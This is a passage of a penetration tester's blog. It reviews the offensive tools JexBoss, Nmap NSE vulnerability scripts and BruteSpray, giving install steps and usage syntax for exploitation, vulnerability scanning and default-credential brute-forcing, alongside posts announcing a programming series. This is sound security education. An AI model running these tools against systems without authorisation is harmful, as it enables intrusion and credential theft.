<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEJ_bOR84di2cu3By11AMMZ53YUc3cCpk9PXOvnPvrVpiSkPhusj0Pt5GcS3SSJRCSguZU2JfUGnYDk8ywqplJ6Fq04ijGwKUtEfHda6w5J_H__-UiYSxASvoLDBEUXkZ9iJE8eUSQTA/s1600/cme_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="830" data-original-width="710" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEJ_bOR84di2cu3By11AMMZ53YUc3cCpk9PXOvnPvrVpiSkPhusj0Pt5GcS3SSJRCSguZU2JfUGnYDk8ywqplJ6Fq04ijGwKUtEfHda6w5J_H__-UiYSxASvoLDBEUXkZ9iJE8eUSQTA/s400/cme_2.png" width="341" /></a></div>
<br />
For the "smb" protocol, there are a number of different modules that can be used as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyMYrsAkgmI175cu9UGcHrKIFuyP91QL24PIr-UjxSh-Rf2xrhFku9uosI82_ddlBMnVk3cKAC_xzM8E92ndDi1HIsAFPFV184478ZIUPITWyIO4FAW9lsdqt98MLxx_0uT61CL4TEi9Q/s1600/cme_3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="1552" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyMYrsAkgmI175cu9UGcHrKIFuyP91QL24PIr-UjxSh-Rf2xrhFku9uosI82_ddlBMnVk3cKAC_xzM8E92ndDi1HIsAFPFV184478ZIUPITWyIO4FAW9lsdqt98MLxx_0uT61CL4TEi9Q/s400/cme_3.png" width="400" /></a></div>
<br />
<br /></div>
<div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/I2ctzF1tZX8/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/I2ctzF1tZX8?feature=player_embedded" width="320"></iframe></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-68793300428069411192018-02-12T08:08:00.003-05:002020-11-17T12:46:14.942-05:00Tool Review - JexBoss<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3RSpGe9zs9jbZZrvJjiSv2gG7XaFA6jXs6QNGCI_HAKcvDES1drm6WZ9b998j-4_kbFSliiyKnFpGBbhXA-ZGGQUG4Onh3agxZS59SIfE0sanhXoGRdPK2SI-kxMx-4tUO-KFHa4oOQ/s1600/jexboss_logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="517" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3RSpGe9zs9jbZZrvJjiSv2gG7XaFA6jXs6QNGCI_HAKcvDES1drm6WZ9b998j-4_kbFSliiyKnFpGBbhXA-ZGGQUG4Onh3agxZS59SIfE0sanhXoGRdPK2SI-kxMx-4tUO-KFHa4oOQ/s400/jexboss_logo.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Source</h2>
<a href="https://github.com/joaomatosf/jexboss">https://github.com/joaomatosf/jexboss</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
João Filho Matos Figueiredo/<a href="https://twitter.com/joaomatosf">@joaomatosf</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Description</h2>
<div>
<div style="text-align: left;">
JexBoss is just the shortened name for the "JBoss (and other Java Deserialization Vulnerabilities) verify and EXploitation Tool"</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
JexBoss is a python tool designed to identify /test for the presence of various exploitable vulnerabilities that can be found in JBoss Application Server, Tomcat, Jenkins, or other Java frameworks/platforms/etc...</div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/joaomatosf/jexboss/blob/master/LICENSE">Apache License, Version 2.0</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, the user will probably just download the source from GitHub:</div>
<blockquote class="tr_bq">
<i>git clone </i><i>https://github.com/joaomatosf/jexboss.git</i></blockquote>
<div>
and then they will need to ensure all dependencies are installed:</div>
<div>
<blockquote class="tr_bq">
<i>pip install -r requires.txt</i></blockquote>
<div style="text-align: left;">
Or the user could download the latest version from GitHub as follows:</div>
<blockquote class="tr_bq" style="overflow-wrap: break-word; text-align: left; white-space: pre-wrap; word-wrap: break-word;">
<i>Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip</i><i>unzip master.zip</i><i>cd jexboss-master</i><i>pip install -r requires.txt</i></blockquote>
<div style="overflow-wrap: break-word; text-align: left; white-space: pre-wrap; word-wrap: break-word;">
JexBoss can also be installed on Windows systems as well. According to the developer, the user can you can use the <a href="https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1">Git Bash</a> to run JexBoss. Follow the steps below:</div>
<ul style="text-align: left;">
<li><i>Download and install <a href="https://www.python.org/downloads/release/python-2712/">Python</a></i></li>
<li><i>Download and install <a href="https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1">Git for Windows</a></i></li>
<li><i>After installing, run the Git for Windows and type the following commands:</i></li>
</ul>
<blockquote class="tr_bq">
<i>PATH=$PATH:C:\Python27\<br />PATH=$PATH:C:\Python27\Scripts<br />git clone https://github.com/joaomatosf/jexboss.git<br />cd jexboss<br />pip install -r requires.txt</i></blockquote>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most Linux tools, JexBoss comes with the typical "-h" flag to display the help/usage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9__FsLDAUUX-LtTidz3BKOy0VLSEpqg9EMdUOm9xHgiMwiqC9htx4XiomzCmWlt4n4C95BBA8KLHqSIxlKuHiTFQoYv2ZpK5uocT3D-uWBwhs_3Ah8ni_gmnlPAA9c6k0Bc1t9uT1b6U/s1600/jexboss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="922" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9__FsLDAUUX-LtTidz3BKOy0VLSEpqg9EMdUOm9xHgiMwiqC9htx4XiomzCmWlt4n4C95BBA8KLHqSIxlKuHiTFQoYv2ZpK5uocT3D-uWBwhs_3Ah8ni_gmnlPAA9c6k0Bc1t9uT1b6U/s320/jexboss1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcIxm-vb36T2WSdPV1Pk04Gsepg-OZ9ep_xZ-gJ2QbhAsg5fkYFwcLBDPdZRkQrC2sdEz5IbxpADTVIyCCM_1g4ptgyc0EIPj5ZfDEfY7uiZoIMKMukKSWBxb_Q06qzhlBHTHGur-Radk/s1600/jexboss2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="923" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcIxm-vb36T2WSdPV1Pk04Gsepg-OZ9ep_xZ-gJ2QbhAsg5fkYFwcLBDPdZRkQrC2sdEz5IbxpADTVIyCCM_1g4ptgyc0EIPj5ZfDEfY7uiZoIMKMukKSWBxb_Q06qzhlBHTHGur-Radk/s320/jexboss2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrAXHrMBdQ0jwM2cW3DUuvS1G6K6nq_VUz51brG7sHNeHRNXTce4O5d8MATuX0HYB-WjwCXhkTQk50H9Ub-eat-QiWhSdExzCZ-2SHx_7ofuUMyAnYYCKo9p6QA1aKXmCh4_T2uLRcCdY/s1600/jexboss3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="921" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrAXHrMBdQ0jwM2cW3DUuvS1G6K6nq_VUz51brG7sHNeHRNXTce4O5d8MATuX0HYB-WjwCXhkTQk50H9Ub-eat-QiWhSdExzCZ-2SHx_7ofuUMyAnYYCKo9p6QA1aKXmCh4_T2uLRcCdY/s320/jexboss3.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXya8bFhuaTBHBm76D4dohAx2VwwM90TF22IGJoUbn54pGY6aTJq4BfHJNVxmyBWepV7epfYlXeF1jfuCxni5UpMMYadvDYAUe6q_BojE-ZDipUWJ0uQ1K2eRZ0iaK_zshcWAtnCSb928/s1600/jexboss4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="923" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXya8bFhuaTBHBm76D4dohAx2VwwM90TF22IGJoUbn54pGY6aTJq4BfHJNVxmyBWepV7epfYlXeF1jfuCxni5UpMMYadvDYAUe6q_BojE-ZDipUWJ0uQ1K2eRZ0iaK_zshcWAtnCSb928/s320/jexboss4.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
That shows the syntax to execute JexBoss is:<br />
<blockquote class="tr_bq">
<i>usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] </i><i> [-mode {standalone,auto-scan,file-scan}] [--app-unserialize]</i><i> [--servlet-unserialize] [--jboss] [--jenkins] [--struts2]</i><i> [--jmxtomcat] [--proxy PROXY] [--proxy-cred LOGIN:PASS]</i><i> [--jboss-login LOGIN:PASS] [--timeout TIMEOUT]</i><i> [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD]</i><i> [--dns URL] [--windows] [--post-parameter PARAMETER]</i><i> [--show-payload]</i><i> [--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}]</i><i> [--load-gadget FILENAME] [--force] [-host HOST]</i><i> [-network NETWORK] [-ports PORTS] [-results FILENAME]</i><i> [-file FILENAME_HOSTS] [-out FILENAME_RESULTS]</i></blockquote>
</div>
<div>
As with most tools, not all of those command line options are necessary. At the very minimum, the user will need to enter:</div>
<blockquote class="tr_bq">
<i>jexboss.py -u <hostname/IP/URL></i></blockquote>
<div>
Beyond the that simple command, the user can specify any of the other options as well, depending on their needs. Some of the other command line options include flags for enabling Auto-Exploitation of vulnerable systems, flags to test for just one of JBoss/Jenkins/Struts2/Tomcat, and flags to specify login credentials.</div>
<div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/1OQfDjooaRE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/1OQfDjooaRE?feature=player_embedded" width="320"></iframe></div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-63526788770443211492018-02-05T08:13:00.003-05:002020-11-17T12:46:27.146-05:00Intro to Programming - Part 1<div dir="ltr" style="text-align: left;" trbidi="on">
This is my first post of a new series of programming centric posts. This series will be starting with a short overview of common programming topic without going into too much depth on basic concepts like, <i>What is a programming Language</i>, <i>What is a variable</i>, etc...<br />
<br />
There are entire courses, college classes, and so on available if someone really wants to learn the topics in more detail.<br />
<br />
The purpose of this "Intro to Programming" series is to make sure everyone has at least a basic understanding before I get into the next series on "Intro to Python Programming". Once that series is complete, I will be moving on into "Python for Pentesters".<br />
<br />
<b>Video:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/jrOfxRPv48c/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/jrOfxRPv48c?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
<b>SlideDeck via SlideShare:</b><br />
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/uAQQpIrW9Am6qk" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/AdamCompton4/intro-toprograming-part1" target="_blank" title="Intro to programing part1">Intro to programing part1</a> </strong> from <strong><a href="https://www.slideshare.net/AdamCompton4" target="_blank">Adam Compton</a></strong> </div>
</div>
</div><span><a name='more'></a></span>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-16462795041825905242018-01-29T08:04:00.001-05:002020-11-17T12:46:35.728-05:00Tool Review - Nmap NSE Scripts<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://nmap.org/images/nmap-logo-256x256.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" src="https://nmap.org/images/nmap-logo-256x256.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<br />
<h2 style="text-align: left;">
Source</h2>
<a href="https://nmap.org/">https://nmap.org/</a><br />
<a href="https://github.com/nmap/nmap">https://github.com/nmap/nmap</a><br />
<a href="https://svn.nmap.org/">https://svn.nmap.org/</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
Originally written by <a href="http://insecure.org/fyodor/">Gordon Lyon (Fyodor Vaskovich)</a><br />
As Nmap is opensource, many other people have contributed to it over the years.<br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Description</h2>
<div>
Nmap is probably one of, if not the most, recognized and used security tool. Among Nmaps features are, host discovery, port scanning, service version detection, OS detection, and the Nmap Scripting Engine (NSE).<br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
License</h2>
<a href="https://nmap.org/book/man-legal.html">Custom License based on GPLv2</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, there will be a prepackaged bundle for it. For example, on <a href="https://www.kali.org/">Kali Linux</a>, it is easy to install it from apt:<br />
<blockquote class="tr_bq">
<i>apt-get install nmap </i></blockquote>
However, if the user wishes to have the latest and greatest version of Nmap, they will need to download it and install it from source:</div>
<blockquote class="tr_bq">
<i>git clone </i><i>https://github.com/nmap/nmap.git</i></blockquote>
<div>
and then they will need to configure and build the binaries:</div>
<div>
<blockquote class="tr_bq">
<i>cd nmap
./configure</i><br />
<i>make</i><br />
<i>make install</i></blockquote>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<div style="text-align: left;">
A very in-depth installation guide can be found <a href="https://nmap.org/book/install.html">here</a>.</div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Sample NSE Usage</h2>
It is the NSE that we will be looking at today. As I stated above, many people know of and have used Nmap and as such, I do not plan on covering all of the standard uses and features of it; there are plenty of other blogs, videos, and books out there already for that. Instead, I want to focus on the NSE and how it can be used in a penetration assessment.<br />
<br />
At the time of writing this article, there are <a href="https://nmap.org/nsedoc/index.html">586 NSE scripts</a>. Those are associated with 14 (15 if you include the "all" category) script categories:<br />
<div style="text-align: left;">
</div>
<ul>
<li>all</li>
<li>auth</li>
<li>broadcast</li>
<li>brute</li>
<li>default</li>
<li>discovery</li>
<li>dos</li>
<li>exploit</li>
<li>external</li>
<li>fuzzer</li>
<li>intrusive</li>
<li>malware</li>
<li>safe</li>
<li>version</li>
<li>vuln</li>
</ul>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
To use any of the scripts, the user will need to specify them on the command line using the "<i>--script</i>" flag. For example, if they wished to execute the <i>smb-security-mode.nse</i> script, they would type:</div>
<blockquote class="tr_bq">
<i>nmap --script smb-security-mode.nse -p 445 <target IP></i></blockquote>
Multiple scripts can be specified at one time by separating them with a comma:<br />
<blockquote class="tr_bq">
<i>nmap --script smb-security-mode.nse,smb-os-discovery.nse -p 445 <target IP></i></blockquote>
Similarly, an entire category can be specified:<br />
<blockquote class="tr_bq">
<i>nmap --script discovery <target IP></i></blockquote>
A more complicated selection of scripts can be determined using the <i>and</i>, <i>or</i>, and <i>not</i> operators. For example, if the user wished to run every script except those in the <i>dos</i> category:<br />
<blockquote class="tr_bq">
<i>nmap --script "not dos" <target IP></i></blockquote>
Or possibly all scripts that are in the vuln category but also the safe category:<br />
<blockquote class="tr_bq">
<i>nmap --script "vuln and safe" <target IP></i></blockquote>
<div>
By utilizing the script categories, boolean operators, and single script selections, it is possible to be very specific in determining the script selections.</div>
<div>
<br /></div>
Yes that was a lot of information there and yes I could probably write an entire book on just that (and I am sure someone probably already has), but for this article, I wish to focus mostly on the <i>vuln</i> script category.<br />
<br />
First, let's try to find any windows/smb vulnerabilities on a target system:<br />
<blockquote class="tr_bq">
<i>nmap --script vuln -p445 <target IP></i></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwNhmqr3YRMTbfXh8fF8JMZW8G8hyphenhyphenotKKQLIDqyTumvglOtT512hzfwlyM6gvXrRq-JNJiTdzCNPkjvQ33q3dvKQI4Ni6mz47MjVSQOmOmiP1VqxvayUxEWtYa6LjPvCHemQV3azaSiA/s1600/nmap_script_1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1358" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwNhmqr3YRMTbfXh8fF8JMZW8G8hyphenhyphenotKKQLIDqyTumvglOtT512hzfwlyM6gvXrRq-JNJiTdzCNPkjvQ33q3dvKQI4Ni6mz47MjVSQOmOmiP1VqxvayUxEWtYa6LjPvCHemQV3azaSiA/s400/nmap_script_1.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
So, this particular host appears to be missing a few critical patches which we would likely be able to exploit and gain access.</div>
<div>
<br /></div>
<div>
But that was just for port 445/tcp, what does this look like for other ports, like 5432/TCP (postgresql)?</div>
<blockquote class="tr_bq">
<i>nmap --script (vuln and safe) <target IP></i></blockquote>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqtp84O8QBDAYPtNZlLd7NNQrr02YxMMUv0ZlLv7e6q-zV7X6aT5efozGbFLT2ny2h-L748SDEo6MZy6npuROQj9z2rMYIwfljbvPjkLXWhEIUkJhEcJjXCNcUj_sDo02drrCdIAINKB4/s1600/nmap_script_2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="1003" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqtp84O8QBDAYPtNZlLd7NNQrr02YxMMUv0ZlLv7e6q-zV7X6aT5efozGbFLT2ny2h-L748SDEo6MZy6npuROQj9z2rMYIwfljbvPjkLXWhEIUkJhEcJjXCNcUj_sDo02drrCdIAINKB4/s400/nmap_script_2.jpg" width="400" /></a></div>
<div>
<br /></div>
This was just a sampling of the types of findings that Nmap is able to identify.<br />
<br />
That will be enough for this article. I may do another article on Nmap in the future, but for now, this should be enough to get people interested in looking into the other items that Nmap can do. Now go out and try it out on your own test network.</div>
<div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Video</h2>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/9ASPbGcTajo/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/9ASPbGcTajo?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-88904775235045334352018-01-22T09:16:00.001-05:002020-11-17T12:46:43.455-05:00Tool Review - BruteSpray<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/261d824db889994a608b0ca3e4976deb607759b7/687474703a2f2f692e696d6775722e636f6d2f6b3942444235522e706e67" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="800" height="207" src="https://camo.githubusercontent.com/261d824db889994a608b0ca3e4976deb607759b7/687474703a2f2f692e696d6775722e636f6d2f6b3942444235522e706e67" width="320" /></a></div>
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<br />
<br />
<h2 style="text-align: left;">
Source</h2>
<a href="https://github.com/x90skysn3k/brutespray">https://github.com/x90skysn3k/brutespray</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
Shane Young/<a href="https://twitter.com/x90skysn3k">@x90skysn3k</a> & Jacob Robles/<a href="https://twitter.com/shellfail">@shellfail</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Description</h2>
<div>
BruteSpray is a python script that takes a <a href="https://nmap.org/">Nmap</a> gnmap/xml output as an input file and automatically starts brute-forcing services with default credentials using <a href="https://github.com/jmk-foofus/medusa">Medusa</a>.<br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/x90skysn3k/brutespray/blob/master/LICENSE.md">MIT</a><br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, the user will need to download the source from GitHub:</div>
<blockquote class="tr_bq">
<i>git clone https://github.com/x90skysn3k/brutespray.git</i></blockquote>
<div>
and then they will need to ensure all dependencies are installed:</div>
<div>
<blockquote class="tr_bq">
<i>pip install -r requirements.txt</i></blockquote>
On <a href="https://www.kali.org/">Kali Linux</a>, it is much easier. Simple install from apt:<br />
<blockquote class="tr_bq">
<i>apt-get install brutespray </i></blockquote>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most Linux tools, brutespray comes with the typical "-h" flag to display the help/usage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMGo6_diuKhs9KhTUm-OANNHIjKkfMXI4PVYbgLADTinSoeLikodfmsz443Q0kZC4ACMiiWDs8ACOg0P5_WvC1KFT8u4XtiewM5tGS04hIP5Kz8oCz5G3YMlgaG-TC4TMJ0m3oDKEu0M/s1600/brute_help.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1228" data-original-width="1338" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMGo6_diuKhs9KhTUm-OANNHIjKkfMXI4PVYbgLADTinSoeLikodfmsz443Q0kZC4ACMiiWDs8ACOg0P5_WvC1KFT8u4XtiewM5tGS04hIP5Kz8oCz5G3YMlgaG-TC4TMJ0m3oDKEu0M/s320/brute_help.jpg" width="320" /></a></div>
<br />
That shows the syntax to execute brutespray is:<br />
<blockquote class="tr_bq">
<i>brutespray.py -f <input file> -t <# of threads> -T <# of simultaneous hosts> -u/-U <username/UsernameFile> -p/-P <password/PasswordFile> -c -i</i></blockquote>
</div>
<div>
Not all of those command line options are necessary. At the very minimum, the user will need to enter:</div>
<blockquote class="tr_bq">
<i>brutespray.py -f <input file></i></blockquote>
<div>
Beyond the that simple command, the user can specify any of the other options as well, depending on their needs.</div>
<div>
Of these other command line options, the most interesting is the "-i (interactive)" flag. When using this option, the user is prompted for all of the other information in a "Wizard" like manner:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp8C0_aFJBBx_8fDKJozA6B6KzpSyVIRiRGM_G5Bb0UMwWR7OYPUs4m3q6GTTQLp9C-EOmu2yNcd03LRjrcurcbdMqw1YvfwTGoS-H5yhSjcGkiviySAFgtlGvaM_QkGZAVT-PRDzAAg/s1600/brute_wizard.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1096" data-original-width="1334" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp8C0_aFJBBx_8fDKJozA6B6KzpSyVIRiRGM_G5Bb0UMwWR7OYPUs4m3q6GTTQLp9C-EOmu2yNcd03LRjrcurcbdMqw1YvfwTGoS-H5yhSjcGkiviySAFgtlGvaM_QkGZAVT-PRDzAAg/s320/brute_wizard.jpg" width="320" /></a></div>
<br /></div>
<div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<br /></h2>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/jKGcNYj9D_Y/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/jKGcNYj9D_Y?feature=player_embedded" width="320"></iframe></div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-47485380375227552312018-01-16T01:24:00.002-05:002020-11-17T12:46:52.975-05:00A New Year<div dir="ltr" style="text-align: left;" trbidi="on">
Happy 2018!!!!<br />
<br />
Last year I wanted to try something new so I started the Pentest Fails Youtube series. It has been a blast. I enjoyed sharing the stories of both my fails as well as hearing other people share theirs.<br />
<br />
For this year I have a few new plans I would like to share with you.<br />
<div style="text-align: left;">
</div>
<ol>
<li>I will be continuing the Pentest Fails videos.</li>
<li>I will be starting a new video series where I demo and review various pentest tools.</li>
<li>I will be starting a new video series where I step though "Programming for Pentesters".</li>
</ol>
<br />
<div style="text-align: left;">
For the Pentest Fails videos, not much will be changing. I will still be sharing both my stories as well as stories other people have provided me. Of course, there may be a few guest storytellers showing up as well. However, I will be reducing the rate at which I will be releasing these videos to just 1 time a month. This should allow me more time to prepare better videos and hopefully improve the overall quality of the videos and content.</div>
<br />
For the tool review and demo video series, I want to discuss and share the tools that I personally find useful or interesting. I will be creating new blog articles for each tool as well as showing how to install and execute the tool. Due to the nature of the tools, some videos may be shorter than others. I expect to be releasing about 2 new tool demo videos a month.<br />
<br />
Finally, the "Programming for Pentesters" video series. For this, I will be starting with a short introduction to programming and programming concepts followed by discussions of more advanced concepts. As it is the primary language I am currently coding in, most of the code shown in the videos will be written Python. For the basic description of concepts or when I am roughing out a tool idea, I will be using Pseudo-Code as it is much more general and can better convey some concepts. Along with the basic videos in this series, I may also include some "Lets Code" videos where I show the process from concept to final tool for some program I am writing.<br />
<br />
Now being able to pull all of this off will not be an easy task for me, but I feel I can do it and it is a challenge I have set for myself for this year.<br />
<br />
In order to keep everything in line and on time, I am proposing the following schedule for videos:<br />
<div style="text-align: left;">
</div>
<ul>
<li>1st Monday of the Month => "Programming for Pentesters" (and "Let's Code")</li>
<li>2nd Monday of the Month => Tool Demo</li>
<li>3rdMonday of the Month => Pentest Fails</li>
<li>4th Monday of the Month => Tool Demo</li>
<li>5th Monday of the Month => ??? TBD</li>
</ul>
<br />
<div style="text-align: left;">
Now if a given month falls in such a way that it has a 5th Monday, then I will come up with some special content for it. That may take the form of some 1-off video or maybe just an extra of one of the other video series. It will really depend on what I feel like at that time.</div>
<br />
If a given month does NOT have a 4th Monday due to the way the weeks fall, then I will simply forgo the second Tool Demo video for that month.<br />
<br />
Hopefully, everyone enjoys the videos and I look forward to seeing everyone's comments.<br />
<br />
Thank you and have a great day.</div><span><a name='more'></a></span>
